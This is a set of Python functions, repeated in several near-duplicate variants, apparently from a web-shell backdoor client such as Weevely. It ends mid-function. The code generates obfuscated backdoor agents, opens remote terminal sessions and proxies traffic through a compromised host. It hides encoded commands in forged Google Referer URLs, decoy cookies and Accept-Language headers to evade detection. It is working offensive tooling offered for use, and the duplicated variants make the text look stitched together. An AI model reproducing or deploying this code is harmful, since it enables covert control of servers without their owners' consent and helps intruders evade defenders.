def send(self, original_payload):
    """Send the payload hidden inside a forged Google-search Referer.

    The base64-encoded payload is split in three chunks embedded in the
    ei/usg/sig2 query parameters of the fake redirect URL, with the
    headers from config.additional_headers appended.

    Returns the first extracted chunk of the response, or None.
    """
    encoded = base64.b64encode(original_payload.strip())
    cut = len(encoded) / 3

    # Forge a plausible Google redirect URL carrying the three chunks.
    referer = (
        "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s"
        "&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % (
            self.password[:2],
            urllib2.quote(self.url),
            self.query.strip(),
            encoded[:cut],
            encoded[cut:2 * cut],
            encoded[2 * cut:]))

    opener = urllib2.build_opener()
    opener.addheaders = [
        ('User-Agent', random.choice(self.agents)),
        ('Referer', referer),
    ] + config.additional_headers

    dlog.debug('[R] %s' % (referer))

    if config.add_random_param_nocache:
        target = utils.http.add_random_url_param(self.url)
    else:
        target = self.url

    response = opener.open(target).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()
def main(arguments):
    """Dispatch the command-line sub-command.

    'generate' creates an obfuscated backdoor agent on disk and returns;
    'terminal' opens a session against a remote URL; 'session' resumes a
    stored session file.  After session setup, either an interactive
    terminal is started or the single given command is executed.
    """
    if arguments.command == 'generate':
        obfuscated = generate.generate(
            password=arguments.password,
            obfuscator=arguments.obfuscator,
            agent=arguments.agent)
        generate.save_generated(obfuscated, arguments.path)
        log.info(
            messages.generate.generated_backdoor_with_password_s_in_s_size_i %
            (arguments.password, arguments.path, len(obfuscated)))
        return

    if arguments.command == 'terminal':
        session = SessionURL(url=arguments.url, password=arguments.password)
    elif arguments.command == 'session':
        session = SessionFile(arguments.path)

    dlog.debug(pprint.pformat(session))

    modules.load_modules(session)

    if arguments.cmd:
        Terminal(session).onecmd(arguments.cmd)
    else:
        Terminal(session).cmdloop()
def do_request(self):
    """Relay a plain-HTTP proxied request through the net_curl module.

    CONNECT/HTTPS requests are rejected with a 501.  Hop-by-hop headers
    are stripped before forwarding; the response headers and body are
    written back verbatim to the client.
    """
    if self.command == 'CONNECT' or self.path.startswith('https'):
        log.warn(messages.module_net_proxy.https_not_implemented)
        self.requestline = ''
        self.request_version = ''
        self.command = ''
        self.send_error(501, messages.module_net_proxy.https_not_implemented)
        return

    args = [self.path, '-X', self.command, '-i']

    # Connection-control headers must not be forwarded upstream.
    skipped = ('Keep-Alive', 'Proxy-Connection', 'Connection')
    for header in self.headers:
        if header.title() not in skipped:
            args += ['-H', '%s: %s' % (header.title(), self.headers[header])]

    args += ['-H', 'Proxy-Connection: close']

    # Relay any POST body verbatim.
    if self.command == 'POST':
        body_length = int(self.headers.getheader('content-length', 0))
        args += ['-d', self.rfile.read(body_length)]

    result, headers, saved = ModuleExec('net_curl', args).run()

    dlog.debug('> ' + '\r\n> '.join(
        ['%s: %s' % (h.title(), self.headers[h]) for h in self.headers]))
    dlog.debug('< ' + '\r\n< '.join(headers))

    self.wfile.write('\r\n'.join(headers))
    self.wfile.write('\r\n\r\n')
    self.wfile.write(result)
def send(self, original_payload):
    """Send the payload split across three fake session cookies.

    The first cookie carries the two password-derived trigger
    characters; a random number of decoy cookies may follow; the last
    three cookies carry the polluted base64 payload chunks.

    Returns the first extracted chunk of the response, or None.
    """
    encoded = base64.b64encode(original_payload.strip())
    # Chunk boundary computed on the pre-pollution length, as the
    # server recombines using the same fixed split.
    cut = len(encoded) / 3

    prefixes = self.default_prefixes[:]

    # Trigger cookie first: two password-derived characters.
    parts = ['%s=%s' % (prefixes.pop(), self.password[:2])]

    # Optionally stuff some decoy cookies, keeping three names spare
    # for the payload chunks.
    while len(prefixes) > 3 and random.random() <= 0.5:
        decoy = utils.strings.randstr(
            16, False, string.letters + string.digits)
        parts.append('%s=%s' % (prefixes.pop(), decoy))

    # DO NOT fuzz with %, _ (\w on regexp keep _)
    encoded = utils.strings.pollute(data=encoded, charset='#&*-/?@~')

    parts.append('%s=%s' % (prefixes.pop(), encoded[:cut]))
    parts.append('%s=%s' % (prefixes.pop(), encoded[cut:cut * 2]))
    parts.append('%s=%s' % (prefixes.pop(), encoded[cut * 2:]))

    cookie_string = '; '.join(parts)

    opener = urllib2.build_opener()
    opener.addheaders = [
        ('User-Agent', random.choice(self.agents)),
        ('Cookie', cookie_string),
    ]

    dlog.debug('[C] %s' % (cookie_string))

    response = opener.open(self.url).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()
def send(self, original_payload, additional_handlers=None):
    """Send the payload hidden in a forged Google-search Referer.

    The base64-encoded payload is split in three chunks embedded in the
    ei/usg/sig2 parameters of the forged referrer URL.  Extra urllib2
    handlers may be supplied by the caller.

    Returns the first extracted chunk of the response, or None.
    """
    # BUG FIX: a mutable default argument ([]) is shared between calls;
    # use a None sentinel and a fresh list per call instead.
    if additional_handlers is None:
        additional_handlers = []

    payload = base64.b64encode(original_payload.strip())
    length = len(payload)
    third = length / 3
    thirds = third * 2

    referer = (
        "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s"
        "&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % (
            self.password[:2],
            urllib2.quote(self.url),
            self.query.strip(),
            payload[:third],
            payload[third:thirds],
            payload[thirds:]
        )
    )

    opener = urllib2.build_opener(*additional_handlers)

    # When core.conf contains additional cookies, carefully merge
    # the new cookies and UA and add all the other headers
    additional_headers = []
    additional_ua = ''
    for h in self.additional_headers:
        if h[0].lower() == 'user-agent' and h[1]:
            additional_ua = h[1]
        elif h[0].lower() == 'referer' and h[1]:
            # Drop configured referrers: the forged one must survive.
            pass
        else:
            additional_headers.append(h)

    opener.addheaders = [
        ('User-Agent', (additional_ua
                        if additional_ua
                        else random.choice(self.agents))),
        ('Referer', referer),
    ] + additional_headers

    dlog.debug('[R] %s' % (referer))

    url = (
        self.url
        if not config.add_random_param_nocache
        else utils.http.add_random_url_param(self.url)
    )

    response = opener.open(url).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()
def send(self, original_payload):
    """Send the payload hidden in a forged Google-search Referer.

    Merges user-configured headers: a configured User-Agent replaces
    the random one, and any configured Referer is dropped so it cannot
    clobber the payload-carrying one.

    Returns the first extracted chunk of the response, or None.
    """
    encoded = base64.b64encode(original_payload.strip())
    cut = len(encoded) / 3

    referer = (
        "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s"
        "&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % (
            self.password[:2],
            urllib2.quote(self.url),
            self.query.strip(),
            encoded[:cut],
            encoded[cut:2 * cut],
            encoded[2 * cut:]))

    opener = urllib2.build_opener()

    # When core.conf contains additional cookies, carefully merge
    # the new cookies and UA and add all the other headers
    merged = []
    custom_ua = ''
    for h in self.additional_headers:
        key = h[0].lower()
        if key == 'user-agent' and h[1]:
            custom_ua = h[1]
        elif key == 'referer' and h[1]:
            continue
        else:
            merged.append(h)

    opener.addheaders = [
        ('User-Agent', custom_ua or random.choice(self.agents)),
        ('Referer', referer),
    ] + merged

    dlog.debug('[R] %s' % (referer))

    if config.add_random_param_nocache:
        target = utils.http.add_random_url_param(self.url)
    else:
        target = self.url

    response = opener.open(target).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()
def send(self, original_payload, additional_handlers=None):
    """POST the compressed, xored, base64-wrapped payload.

    The payload is wrapped between the channel header/trailer markers
    and sent as the POST body.  Extra urllib2 handlers may be supplied.

    Returns the decoded response body, or None on empty/unmatched
    responses or when the connection is closed unexpectedly.
    """
    # BUG FIX: a mutable default argument ([]) is shared between calls;
    # use a None sentinel instead.
    if additional_handlers is None:
        additional_handlers = []

    obfuscated_payload = base64.b64encode(
        utils.strings.sxor(
            zlib.compress(original_payload),
            self.shared_key)).rstrip('=')

    wrapped_payload = (
        PREPEND + self.header + obfuscated_payload + self.trailer + APPEND
    )

    opener = urllib2.build_opener(*additional_handlers)

    # BUG FIX: the original appended the whole self.additional_headers
    # list after the User-Agent entry, so a configured UA was sent
    # twice; filter it out, as the sibling channels do.  First
    # configured UA wins, matching the original `break` semantics.
    additional_headers = []
    additional_ua = ''
    for h in self.additional_headers:
        if h[0].lower() == 'user-agent' and h[1]:
            if not additional_ua:
                additional_ua = h[1]
        else:
            additional_headers.append(h)

    opener.addheaders = [
        ('User-Agent', (additional_ua if additional_ua else self.agent))
    ] + additional_headers

    dlog.debug('[R] %s...' % (wrapped_payload[0:32]))

    url = (
        self.url
        if not config.add_random_param_nocache
        else utils.http.add_random_url_param(self.url)
    )

    try:
        response = opener.open(url, data=wrapped_payload).read()
    except httplib.BadStatusLine as e:
        # TODO: add this check to the other channels
        log.warn('Connection closed unexpectedly, aborting command.')
        return

    if not response:
        return

    # Multiple debug string may have been printed, using findall
    matched_debug = self.re_debug.findall(response)
    if matched_debug:
        dlog.debug('\n'.join(matched_debug))

    matched = self.re_response.search(response)
    if matched and matched.group(1):
        return zlib.decompress(
            utils.strings.sxor(
                base64.b64decode(
                    matched.group(1)),
                self.shared_key))
def send(self, original_payload):
    """Send the payload spread over forged Referer headers.

    Each prepared referrer is requested in turn; the chunk positions
    are signalled through the Accept-Language header.  As soon as a
    response embeds the expected reply, it is decoded and returned.
    """
    # Generate session id and referrers
    session_id, referrers_data = self._prepare(original_payload)

    jar = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

    total = len(referrers_data)

    for index, (referrer, positions) in enumerate(referrers_data):

        language_header = self._generate_header_accept_language(
            positions, session_id)
        accept_header = self._generate_header_accept()

        opener.addheaders = [
            ('Referer', referrer),
            ('Accept-Language', language_header),
            ('Accept', accept_header),
            ('User-Agent', random.choice(self.agents))
        ]

        dlog.debug(
            '[v:%i/%i] %s %s %s' % (
                index, total, language_header, referrer, positions))

        response = opener.open(self.url).read()
        if not response:
            continue

        # Multiple debug string may have been printed, using findall
        debug_matches = self.re_debug.findall(response)
        if debug_matches:
            dlog.debug('\n'.join(debug_matches))

        reply = self.re_response.search(response)
        if reply and reply.group(1):
            return zlib.decompress(
                utilities.sxor(
                    base64.b64decode(reply.group(1)),
                    self.shared_key))
def send(self, original_payload):
    """Send the payload spread over forged Referer headers.

    Chunk positions travel in the Accept-Language header; headers from
    config.additional_headers are appended.  The first response that
    embeds the expected reply is decoded and returned.
    """
    # Generate session id and referrers
    session_id, referrers_data = self._prepare(original_payload)

    jar = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

    count = len(referrers_data)

    for index, (referrer, positions) in enumerate(referrers_data):

        language_header = self._generate_header_accept_language(
            positions, session_id)
        accept_header = self._generate_header_accept()

        opener.addheaders = [
            ('Referer', referrer),
            ('Accept-Language', language_header),
            ('Accept', accept_header),
            ('User-Agent', random.choice(self.agents))
        ] + config.additional_headers

        dlog.debug(
            '[v:%i/%i] %s %s %s' % (
                index, count, language_header, referrer, positions))

        if config.add_random_param_nocache:
            target = utils.http.add_random_url_param(self.url)
        else:
            target = self.url

        response = opener.open(target).read()
        if not response:
            continue

        # Multiple debug string may have been printed, using findall
        debug_matches = self.re_debug.findall(response)
        if debug_matches:
            dlog.debug('\n'.join(debug_matches))

        reply = self.re_response.search(response)
        if reply and reply.group(1):
            return zlib.decompress(
                utils.strings.sxor(
                    base64.b64decode(reply.group(1)),
                    self.shared_key))
def do_request(self):
    """Forward a plain-HTTP proxied request via the net_curl module.

    CONNECT/HTTPS requests are answered with 501.  Connection-control
    headers are dropped, the remaining request is replayed with
    net_curl and its raw headers and body are piped back to the
    client socket.
    """
    if self.command == 'CONNECT' or self.path.startswith('https'):
        log.warn(messages.module_net_proxy.https_not_implemented)
        self.requestline = ''
        self.request_version = ''
        self.command = ''
        self.send_error(
            501,
            messages.module_net_proxy.https_not_implemented
        )
        return

    curl_arguments = [self.path, '-X', self.command, '-i']

    for name in self.headers:
        # Hop-by-hop headers must not be forwarded.
        if name.title() in ('Keep-Alive', 'Proxy-Connection', 'Connection'):
            continue
        curl_arguments += [
            '-H', '%s: %s' % (name.title(), self.headers[name])
        ]

    curl_arguments += ['-H', 'Proxy-Connection: close']

    if self.command == 'POST':
        body_size = int(self.headers.getheader('content-length', 0))
        curl_arguments += ['-d', self.rfile.read(body_size)]

    result, headers, saved = ModuleExec('net_curl', curl_arguments).run()

    dlog.debug('> ' + '\r\n> '.join(
        ['%s: %s' % (n.title(), self.headers[n]) for n in self.headers]))
    dlog.debug('< ' + '\r\n< '.join(headers))

    self.wfile.write('\r\n'.join(headers))
    self.wfile.write('\r\n\r\n')
    self.wfile.write(result)
def main(arguments):
    """Dispatch the requested sub-command.

    generate: build an obfuscated agent and save it to disk.
    terminal: open a session against a remote backdoor URL.
    session:  resume a previously stored session file.
    """
    if arguments.command == 'generate':
        obfuscated = generate.generate(
            password = arguments.password,
            obfuscator = arguments.obfuscator,
            agent = arguments.agent
        )
        generate.save_generated(obfuscated, arguments.path)
        # BUG FIX: the message placeholders are password first, then
        # path (generated_backdoor_with_password_s_in_s_size_i); the
        # arguments were swapped (path, password).
        log.info(
            messages.generate.generated_backdoor_with_password_s_in_s_size_i %
            (arguments.password, arguments.path, len(obfuscated))
        )
        return
    elif arguments.command == 'terminal':
        session = SessionURL(
            url = arguments.url,
            password = arguments.password
        )
    elif arguments.command == 'session':
        session = SessionFile(arguments.path)

    dlog.debug(
        pprint.pformat(session)
    )

    modules.load_modules(session)

    if not arguments.cmd:
        Terminal(session).cmdloop()
    else:
        Terminal(session).onecmd(arguments.cmd)
def send(self, original_payload):
    """Send the payload hidden in a forged Google-search Referer.

    Simple variant: random User-Agent only, no extra header merging and
    no cache-busting URL parameter.

    Returns the first extracted chunk of the response, or None.
    """
    encoded = base64.b64encode(original_payload.strip())
    cut = len(encoded) / 3

    referer = (
        "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s"
        "&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % (
            self.password[:2],
            urllib2.quote(self.url),
            self.query.strip(),
            encoded[:cut],
            encoded[cut:2 * cut],
            encoded[2 * cut:]))

    opener = urllib2.build_opener()
    opener.addheaders = [
        ('User-Agent', random.choice(self.agents)),
        ('Referer', referer),
    ]

    dlog.debug('[R] %s' % (referer))

    response = opener.open(self.url).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()
def send(self, original_payload):
    """Send the payload through steganographic referrers.

    The payload prepared by _prepare() is spread over forged Referer
    URLs; the chunk positions are encoded in the Accept-Language
    header.  User-configured headers from core.conf are merged in, with
    configured cookies loaded into the cookie jar.

    Returns the decoded remote response, or None.
    """
    # Generate session id and referrers
    session_id, referrers_data = self._prepare(original_payload)

    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

    # When core.conf contains additional cookies, carefully merge
    # the new headers killing the needed ones
    additional_headers = []
    additional_ua = ""

    for h in self.additional_headers:
        if h[0].lower() == "user-agent" and h[1]:
            additional_ua = h[1]
        # BUG FIX: this branch was a separate `if`, so a configured
        # User-Agent also fell into the final `else` and was sent twice.
        elif h[0].lower() == "cookie" and h[1]:
            for cookie in h[1].rstrip(";").split("; "):
                # Split on the first '=' only: cookie values may
                # themselves contain '=' characters.
                name, value = cookie.split("=", 1)
                cj.set_cookie(
                    cookielib.Cookie(
                        version=0,
                        name=name,
                        value=value,
                        port=None,
                        port_specified=False,
                        domain="",
                        domain_specified=True,
                        domain_initial_dot=True,
                        path="/",
                        path_specified=True,
                        secure=False,
                        expires=None,
                        discard=True,
                        comment=None,
                        comment_url=None,
                        rest={"HttpOnly": None},
                    )
                )
        elif h[0].lower() in ("accept", "accept-language", "referer"):
            # Skip sensible headers
            pass
        else:
            additional_headers.append(h)

    for referrer_index, referrer_data in enumerate(referrers_data):

        accept_language_header = self._generate_header_accept_language(
            referrer_data[1], session_id)
        accept_header = self._generate_header_accept()

        opener.addheaders = [
            ("Referer", referrer_data[0]),
            ("Accept-Language", accept_language_header),
            ("Accept", accept_header),
            ("User-Agent",
             (additional_ua if additional_ua else random.choice(self.agents))),
        ] + additional_headers

        dlog.debug(
            "[H %i/%i]\n%s\n[C] %s"
            % (
                referrer_index,
                len(referrers_data) - 1,
                "\n".join("> %s: %s" % (h[0], h[1]) for h in opener.addheaders),
                cj,
            )
        )

        url = (
            self.url
            if not config.add_random_param_nocache
            else utils.http.add_random_url_param(self.url)
        )

        response = opener.open(url).read()
        if not response:
            continue

        # Multiple debug string may have been printed, using findall
        matched_debug = self.re_debug.findall(response)
        if matched_debug:
            dlog.debug("\n".join(matched_debug))

        matched = self.re_response.search(response)
        if matched and matched.group(1):
            return zlib.decompress(
                utils.strings.sxor(
                    base64.b64decode(matched.group(1)), self.shared_key))
def _prepare(self, payload):
    """Compress, xor and b64-encode the payload, then spread it over
    forged referrer URLs built from the vanilla templates.

    Returns (session_id, referrers) where referrers is a list of
    (referrer_url, chunk_positions) tuples.

    Raises ChannelException if no suitable session id can be generated
    or a template places a chunk parameter beyond the ninth.
    """
    obfuscated_payload = base64.urlsafe_b64encode(
        utils.strings.sxor(zlib.compress(payload), self.shared_key)
    ).rstrip("=")

    # Generate a random session_id whose derived header/footer markers
    # do not collide with the payload characters
    for i in range(30):
        session_id = "".join(
            random.choice(string.ascii_lowercase) for x in range(2))

        # Generate 3-character urlsafe_b64encode header and footer
        # checkable on server side
        header = hashlib.md5(
            session_id + self.shared_key[:4]).hexdigest().lower()[:3]
        footer = hashlib.md5(
            session_id + self.shared_key[4:8]).hexdigest().lower()[:3]

        if (
            header not in obfuscated_payload
            and footer not in obfuscated_payload
            and (obfuscated_payload + footer).find(footer)
            == len(obfuscated_payload)
        ):
            break
    else:
        # BUG FIX: the original `elif i == 30` was dead code, since
        # range(30) tops out at 29 and the exception was never raised;
        # for/else raises once every attempt is exhausted.
        raise ChannelException(core.messages.stegareferrer.error_generating_id)

    remaining_payload = header + obfuscated_payload + footer

    dlog.debug("DATA TO SEND: " + remaining_payload)
    dlog.debug("HEADER: %s, FOOTER %s" % (header, footer))

    referrers = []

    # Randomize the order
    random.shuffle(self.referrers_vanilla)

    for referrer_index, referrer_vanilla_data in enumerate(
        itertools.cycle(self.referrers_vanilla)
    ):

        # Separate the chunks sizes from the referrers
        referrer_vanilla, chunks_sizes_vanilla = referrer_vanilla_data

        # Clone chunk size to avoid .pop(0) consuming
        chunks_sizes = chunks_sizes_vanilla[:]

        # Separate the query from the rest
        referrer, query = referrer_vanilla.split("?", 1)

        # Apply template on the referrer host
        referrer = referrer.replace("http://${ url }", self.url)

        referrer += "?"

        positions = []

        # Loop the parameters
        parameters = urlparse.parse_qsl(query)
        for parameter_index, content in enumerate(parameters):
            param, value = content

            # Prepend & to parameters
            if parameter_index > 0:
                referrer += "&"

            # Add the templatized parameters
            if not value == "${ chunk }":
                referrer += "%s=%s" % (param, value)
                continue

            # Parameters past the ninth cannot be indexed server-side
            if parameter_index > 9:
                raise ChannelException(
                    core.messages.stegareferrer.error_chunk_position_i_s
                    % (parameter_index, referrer_vanilla)
                )

            # Pick a proper payload size
            min_size, max_size = chunks_sizes.pop(0)

            if not remaining_payload:
                # If not payload, stuff padding
                payload_size = 0
                padding_size = random.randint(min_size, max_size)
            elif len(remaining_payload) <= min_size:
                # Not enough payload, stuff latest payload + padding
                payload_size = len(remaining_payload)
                padding_size = min_size - payload_size
            elif min_size < len(remaining_payload) <= max_size:
                # Enough payload to fill properly the parameter
                payload_size = len(remaining_payload)
                padding_size = 0
            else:
                # Overflowing payload, cut remaining payload to the max
                payload_size = max_size
                padding_size = 0

            # Add crafted parameter
            referrer += "%s=%s%s" % (
                param,
                remaining_payload[:payload_size],
                utils.strings.randstr(padding_size),
            )

            # If some payload was inserted, record its position and cut
            # the remaining payload
            if payload_size:
                positions.append(parameter_index)
                remaining_payload = remaining_payload[payload_size:]

        referrers.append((referrer, positions))

        if not remaining_payload:
            break

    return session_id, referrers
def _prepare(self, payload):
    """Compress, xor and b64-encode the payload and spread it over the
    referrer templates.

    Returns (session_id, referrers), referrers being a list of
    (referrer_url, chunk_positions) tuples.

    Raises ChannelException on session id generation failure or when a
    template places a chunk parameter past the ninth.
    """
    obfuscated_payload = base64.urlsafe_b64encode(
        utilities.sxor(zlib.compress(payload), self.shared_key)).rstrip('=')

    # Generate a random session_id whose derived header/footer markers
    # do not collide with the payload characters
    for i in range(30):
        session_id = ''.join(
            random.choice(string.ascii_lowercase) for x in range(2))

        # Generate 3-character urlsafe_b64encode header and footer
        # checkable on server side
        header = hashlib.md5(
            session_id + self.shared_key[:4]).hexdigest().lower()[:3]
        footer = hashlib.md5(
            session_id + self.shared_key[4:8]).hexdigest().lower()[:3]

        if (header not in obfuscated_payload
                and footer not in obfuscated_payload
                and (obfuscated_payload + footer).find(footer) ==
                len(obfuscated_payload)):
            break
    else:
        # BUG FIX: `elif i == 30` was unreachable (range(30) tops out
        # at 29); for/else raises once every attempt is exhausted.
        raise ChannelException(
            core.messages.stegareferrer.error_generating_id)

    remaining_payload = header + obfuscated_payload + footer

    dlog.debug('DATA TO SEND: ' + remaining_payload)
    dlog.debug('HEADER: %s, FOOTER %s' % (header, footer))

    referrers = []

    # Randomize the order
    random.shuffle(self.referrers_vanilla)

    for referrer_index, referrer_vanilla_data in enumerate(
            itertools.cycle(self.referrers_vanilla)):

        # Separate the chunks sizes from the referrers
        referrer_vanilla, chunks_sizes_vanilla = referrer_vanilla_data

        # Clone chunk size to avoid .pop(0) consuming
        chunks_sizes = chunks_sizes_vanilla[:]

        # Separate the query from the rest
        referrer, query = referrer_vanilla.split('?', 1)
        referrer += '?'

        positions = []

        # Loop the parameters
        parameters = urlparse.parse_qsl(query)
        for parameter_index, content in enumerate(parameters):
            param, value = content

            # Prepend & to parameters
            if parameter_index > 0:
                referrer += '&'

            # Add the templatized parameters
            if not value == '${ chunk }':
                referrer += '%s=%s' % (param, value)
                continue

            # Parameters past the ninth can't be indexed server-side
            if parameter_index > 9:
                raise ChannelException(
                    core.messages.stegareferrer.error_chunk_position_i_s
                    % (parameter_index, referrer_vanilla))

            # Pick a proper payload size
            min_size, max_size = chunks_sizes.pop(0)

            if not remaining_payload:
                # If not payload, stuff padding
                payload_size = 0
                padding_size = random.randint(min_size, max_size)
            elif len(remaining_payload) <= min_size:
                # Not enough payload, stuff latest payload + padding
                payload_size = len(remaining_payload)
                padding_size = min_size - payload_size
            elif min_size < len(remaining_payload) <= max_size:
                # Enough payload to fill properly the parameter
                payload_size = len(remaining_payload)
                padding_size = 0
            else:
                # Overflowing payload, cut remaining payload to the max
                payload_size = max_size
                padding_size = 0

            # Add crafted parameter
            referrer += '%s=%s%s' % (param,
                                     remaining_payload[:payload_size],
                                     utilities.randstr(padding_size))

            # If some payload was inserted, add position and cut
            # remaining payload
            if payload_size:
                positions.append(parameter_index)
                remaining_payload = remaining_payload[payload_size:]

        referrers.append((referrer, positions))

        if not remaining_payload:
            break

    return session_id, referrers
def send(self, original_payload, additional_handlers=None):
    """Send the payload via steganographic referrers, with extra
    urllib2 handlers.

    Chunk positions travel in the Accept-Language header.  Cookies from
    core.conf are loaded into the cookie jar and the other configured
    headers are merged in.

    Returns the decoded response, or None on failure or when the
    connection is closed unexpectedly.
    """
    # Generate session id and referrers
    session_id, referrers_data = self._prepare(original_payload)

    cj = cookielib.CookieJar()

    # BUG FIX: the parameter defaulted to a shared mutable list which
    # was then mutated with .append(), so every call leaked one more
    # HTTPCookieProcessor into subsequent calls.  Work on a copy.
    handlers = list(additional_handlers) if additional_handlers else []
    handlers.append(urllib2.HTTPCookieProcessor(cj))
    opener = urllib2.build_opener(*handlers)

    # When core.conf contains additional cookies, carefully merge
    # the new headers killing the needed ones
    additional_headers = []
    additional_ua = ''

    for h in self.additional_headers:
        if h[0].lower() == 'user-agent' and h[1]:
            additional_ua = h[1]
        # BUG FIX: was a separate `if`, letting a configured User-Agent
        # also reach the final `else` and be sent twice.
        elif h[0].lower() == 'cookie' and h[1]:
            for cookie in h[1].rstrip(';').split('; '):
                # Split on the first '=' only; values may contain '='.
                name, value = cookie.split('=', 1)
                cj.set_cookie(
                    cookielib.Cookie(
                        version=0,
                        name=name,
                        value=value,
                        port=None,
                        port_specified=False,
                        domain='',
                        domain_specified=True,
                        domain_initial_dot=True,
                        path='/',
                        path_specified=True,
                        secure=False,
                        expires=None,
                        discard=True,
                        comment=None,
                        comment_url=None,
                        rest={'HttpOnly': None}
                    )
                )
        elif h[0].lower() in ('accept', 'accept-language', 'referer'):
            # Skip sensible headers
            pass
        else:
            additional_headers.append(h)

    for referrer_index, referrer_data in enumerate(referrers_data):

        accept_language_header = self._generate_header_accept_language(
            referrer_data[1], session_id)
        accept_header = self._generate_header_accept()

        opener.addheaders = [
            ('Referer', referrer_data[0]),
            ('Accept-Language', accept_language_header),
            ('Accept', accept_header),
            ('User-Agent', (
                additional_ua
                if additional_ua
                else random.choice(self.agents)
            ))
        ] + additional_headers

        dlog.debug(
            '[H %i/%i]\n%s\n[C] %s' % (
                referrer_index,
                len(referrers_data) - 1,
                '\n'.join(
                    '> %s: %s' % (h[0], h[1]) for h in opener.addheaders),
                cj
            )
        )

        url = (
            self.url
            if not config.add_random_param_nocache
            else utils.http.add_random_url_param(self.url)
        )

        try:
            response = opener.open(url).read()
        except httplib.BadStatusLine as e:
            # TODO: add this check to the other channels
            log.warn('Connection closed unexpectedly, aborting command.')
            return

        if not response:
            continue

        # Multiple debug string may have been printed, using findall
        matched_debug = self.re_debug.findall(response)
        if matched_debug:
            dlog.debug('\n'.join(matched_debug))

        matched = self.re_response.search(response)
        if matched and matched.group(1):
            return zlib.decompress(
                utils.strings.sxor(
                    base64.b64decode(
                        matched.group(1)),
                    self.shared_key))
def send(self, original_payload, additional_handlers=None):
    """Send the payload via steganographic referrers, with extra
    urllib2 handlers.

    Chunk positions are encoded in the Accept-Language header; cookies
    from core.conf go into the jar, other configured headers are
    merged in.  Returns the decoded response or None.
    """
    # Generate session id and referrers
    session_id, referrers_data = self._prepare(original_payload)

    cj = cookielib.CookieJar()

    # BUG FIX: the shared mutable default list was mutated with
    # .append(), accumulating one HTTPCookieProcessor per call; copy
    # the caller's list instead.
    handlers = list(additional_handlers) if additional_handlers else []
    handlers.append(urllib2.HTTPCookieProcessor(cj))
    opener = urllib2.build_opener(*handlers)

    # When core.conf contains additional cookies, carefully merge
    # the new headers killing the needed ones
    additional_headers = []
    additional_ua = ''
    for h in self.additional_headers:
        if h[0].lower() == 'user-agent' and h[1]:
            additional_ua = h[1]
        # BUG FIX: was a separate `if`, so a configured User-Agent also
        # reached the final `else` and was sent twice.
        elif h[0].lower() == 'cookie' and h[1]:
            for cookie in h[1].rstrip(';').split('; '):
                # Split on the first '=' only; values may contain '='.
                name, value = cookie.split('=', 1)
                cj.set_cookie(
                    cookielib.Cookie(version=0, name=name, value=value,
                                     port=None, port_specified=False,
                                     domain='', domain_specified=True,
                                     domain_initial_dot=True, path='/',
                                     path_specified=True, secure=False,
                                     expires=None, discard=True,
                                     comment=None, comment_url=None,
                                     rest={'HttpOnly': None}))
        elif h[0].lower() in ('accept', 'accept-language', 'referer'):
            # Skip sensible headers
            pass
        else:
            additional_headers.append(h)

    for referrer_index, referrer_data in enumerate(referrers_data):

        accept_language_header = self._generate_header_accept_language(
            referrer_data[1], session_id)
        accept_header = self._generate_header_accept()

        opener.addheaders = [
            ('Referer', referrer_data[0]),
            ('Accept-Language', accept_language_header),
            ('Accept', accept_header),
            ('User-Agent',
             (additional_ua if additional_ua else random.choice(self.agents)))
        ] + additional_headers

        dlog.debug('[H %i/%i]\n%s\n[C] %s' %
                   (referrer_index, len(referrers_data) - 1, '\n'.join(
                       '> %s: %s' % (h[0], h[1])
                       for h in opener.addheaders), cj))

        url = (self.url
               if not config.add_random_param_nocache
               else utils.http.add_random_url_param(self.url))

        try:
            response = opener.open(url).read()
        except httplib.BadStatusLine as e:
            # TODO: add this check to the other channels
            log.warn('Connection closed unexpectedly, aborting command.')
            return

        if not response:
            continue

        # Multiple debug string may have been printed, using findall
        matched_debug = self.re_debug.findall(response)
        if matched_debug:
            dlog.debug('\n'.join(matched_debug))

        matched = self.re_response.search(response)
        if matched and matched.group(1):
            return zlib.decompress(
                utils.strings.sxor(base64.b64decode(matched.group(1)),
                                   self.shared_key))
def send(self, original_payload, additional_handlers=None):
    """Send the payload split across cookies, with extra handlers.

    The trigger cookie (two password-derived characters) comes first,
    followed by any user-configured cookies and the three
    payload-bearing cookies.

    Returns the first extracted chunk of the response, or None.
    """
    # BUG FIX: mutable default arguments are shared between calls;
    # default to None and build a fresh list instead.
    if additional_handlers is None:
        additional_handlers = []

    payload = base64.b64encode(original_payload.strip())
    length = len(payload)
    third = length / 3
    thirds = third * 2

    prefixes = self.default_prefixes[:]

    cookie_payload_string = ''

    # Add random cookies before payload, keeping four prefixes spare:
    # one for the trigger and three for the payload chunks.
    # (The original `> 3 and > 4` test was redundant: both must hold,
    # which is simply `> 4`.)
    while len(prefixes) > 4:
        if random.random() > 0.5:
            break
        cookie_payload_string += (
            prefixes.pop() + '=' +
            utils.strings.randstr(
                16, False, string.letters + string.digits) + '; '
        )

    # DO NOT fuzz with %, _ (\w on regexp keep _)
    payload = utils.strings.pollute(data=payload, charset='#&*-/?@~')

    cookie_payload_string += prefixes.pop() + '=' + payload[:third] + '; '
    cookie_payload_string += (
        prefixes.pop() + '=' + payload[third:thirds] + '; ')
    cookie_payload_string += prefixes.pop() + '=' + payload[thirds:]

    opener = urllib2.build_opener(*additional_handlers)

    # When core.conf contains additional cookies, carefully merge
    # the new cookies and UA and add all the other headers
    additional_headers = []
